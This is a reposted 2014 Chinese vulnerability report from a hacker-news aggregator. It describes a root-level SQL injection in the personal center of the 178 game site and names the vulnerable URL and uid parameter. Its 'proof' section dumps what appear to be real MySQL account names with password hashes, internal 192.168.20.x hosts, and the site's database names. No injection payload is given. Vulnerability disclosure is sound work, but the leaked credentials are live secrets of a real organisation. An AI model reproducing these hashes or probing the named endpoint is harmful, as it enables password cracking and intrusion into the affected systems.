记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

178游戏网存在root权限SQL注射可夸跨库

2014-07-31 16:25

问题存在于个人中心

http://i.178.com/~index.index?uid=1

漏洞证明:

QQ图片20140615210110.jpg







DB User & Pass: root:712bc5ee3d42fdc1:localhost

root:712bc5ee3d42fdc1:127.0.0.1

:712bc5ee3d42fdc1:localhost

repl_user:4b1923db029b410c:192.168.20.%

citeuserooo:70fbbe1837c3940e:192.168.20.%

ranktest:10e55efc386fbf89:192.168.20.%

sns_user:35cf510b3e94820e:192.168.20.%

backup:4b1923db029b410c:192.168.20.65

jsvc_user:542055bd26f15a5c:192.168.20.%

cacti:142bb1aa1e6a5804:192.168.20.%

rank_user:432ea4c87b20fbd2:192.168.20.%

sns_repl:389e6960325eb291:192.168.20.%

py_usr:2217c76d1d6a91d6:192.168.20.1

temp_user:5155339f7d8b2d51:192.168.20.%

Data Bases: information_schema

game

innodb

mysql

sns2

sns_admin

sns_album

sns_api

sns_bet

sns_blog

sns_cite

sns_get_armory

sns_group

sns_gsrank

temp_sns_cite

test





似以前有人提交过这个漏洞 不知道怎么还是存在

修复方案:

过滤吧.貌

知识来源: www.wooyun.org/bugs/wooyun-2014-065079

阅读:67798 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“178游戏网存在root权限SQL注射可夸跨库”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云